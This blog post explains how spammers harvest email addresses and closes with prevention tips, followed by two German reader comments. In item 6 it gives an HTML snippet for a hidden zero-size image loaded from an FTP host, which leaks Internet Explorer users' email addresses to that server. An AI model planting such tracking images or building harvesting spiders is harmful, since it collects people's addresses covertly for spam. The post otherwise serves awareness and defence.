Mail Harvesting Made Easy

It is scary, how simple mail adresses are collected. I think we should have a closer look at how it might be done:

  1. Chain letters
    Chain letters are a wonderful way of collecting as they traveled a while until you get them. Most people just hit the forward button and send it right away. The other mailadresses are sent with it – including your own
  2. Newsgroups and boards
    Ok, nowadays newsgroups are pretty dead, but they still exist. They are something like a public mailbox. Everything posted in there usually got a valid mail adress.
  3. Messenger- and community profiles
    You all know ICQ and similar messengers? They all offer profile pages. They can be harvested without much hassle by either spidering the webpage or (ab)using the internal search protocols.
  4. Guesbooks
    Guestbooks were often used on private homepage for communication with the webmaster to leave a line like ‘great site’ – most often the names of the people leaving a comment are linked to their mailaddress.
  5. Spider
    A spider is an automated program surfing the web for collecting information – search engines use them to index your site. It is not a big hassle to make one that collects mailadresses while spidering around.
  6. Info leaks in software
    Ok… this is really my favorite one. Just imagine you got Internet Explorer installed and some mail client. If you ‘surf’ to a ftp site, you are logged in there automatically as an anonymous user. Regarding the protocol, you are required to leave your mailaddress (which gets logged). Keeping that in mind, we can be nasty, letting the user load an image from an FTP server. For hiding it, we just keep it 0x0 px or transparent: <img src=”ftp://ftp.example.com/path/to/picture.gif” width=”0″ height=”0″ alt=”SpyImage”>
    IE just passes on your mailaddress without a word of warning.

But how to prevent that? First of all – I got some junk addresses just for doing registrations and stuff, which I do not want to do with my main address. Next thing is, that I do not enter mail addresses on guestbooks or profiles if not required. The ones who want one, may have my message sink. Mailaddresses on my websites are never written in plaintext for easy spidering. Regarding the FTP issue…. I am not aware that there is an IE version for linux…

Author:

2 thoughts on “Mail Harvesting Made Easy”

  • Ich glaube, dass es allgemein bekannt ist, wie Spammer auf die E-Mail Adressen kommen und die meisten Menschen, die im Internet ihre E-Mail Adressen veröffentlichen, müssen damit rechnen, dass Spammer diese auch finden können.
    Es gibt aber sehr gute und gleichzeitig kostenlose Anti-Spam Lösungen, die unterschiedliche Technologien gleichzeitig einsetzen und damit ziemlich effektiv Spam erkennen können.
    Als Beispiel fällt mir gerade ASSP ein. ASSP ist Open Source und kostenlos, funktioniert auf mehreren Plattformen und ist nicht sonderlich schwer beim Einrichten.

  • Es ist leider nicht immer so, dass sich die User bewusst sind, was das veröffentlichen ihrer Mailadressen für Konsequenzen hat. Ich spreche da aus Erfahrung aus dem IT Service-Bereich.

Leave a Reply

Your email address will not be published. Required fields are marked *

Notify me of followup comments via e-mail. You can also subscribe without commenting.